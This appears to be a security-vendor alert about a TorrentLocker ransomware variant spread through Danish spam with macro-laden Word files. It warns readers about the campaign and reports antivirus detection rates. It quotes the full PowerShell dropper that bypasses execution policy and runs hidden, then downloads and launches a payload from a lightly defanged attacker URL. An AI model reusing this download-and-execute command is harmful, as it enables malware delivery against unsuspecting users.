Security Alert: New TorrentLocker Variant Targets Denmark in Ransomware Attacks
This new ransomware strain will also steal your usernames and passwords
Two large spam waves swept across Denmark in the past 5 days. Both carry the notorious TorrentLocker ransomware and feature a few new tricks.
Oblivious users are misled into opening a Microsoft Word document in which cybercriminals embedded a malicious macro.
If the victim enables the macro by clicking on “Enable Editing”, a PowerShell code will be executed and it will download ransomware from the TorrentLocker family.
The encrypting malware is downloaded via HTTP GET via the following URL (sanitized for your protection):
* .js2-Order [.] Pl / file / set.rte
This is the complete power shellcode (sanitized for your protection):
C: \ Windows \ System32 \ Windows PowerShell \ v1.0 \ PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent) .DWnlOAdFILE ( ‘http: //48f4339.js2-order [.] Pl / file / set.rte ‘,’ C: \ Users \ [% user profile%] \ AppData \ Roaming.EXE ‘); Start-process ‘C: \ Users \ [% user profile%] \ AppData \ Roaming .exe’.
TorrentLocker immediately injects itself in the explorer.exe process.
This new TorrentLocker variant features a couple of new features:
- it harvests usernames and passwords from the infected computer
- and it can spread to other computers through shared files.
Antivirus detection is still low: 3/55 on VirusTotal.
These spam waves are very aggressive, so please be extra cautious with protecting your inbox and carefully evaluate which emails you open. A similar spam wave spreading TorrentLocker as well still achieves a rather low detection rate, even 4 days after it was discovered: 19/56 on VirusTotal.
There is a tool that can decrypt data locked by some TorrentLocker variants, but it has not been tested on this new variant yet.
Stay safe!*This article features cyber intelligence provided by CSIS Security Group researchers.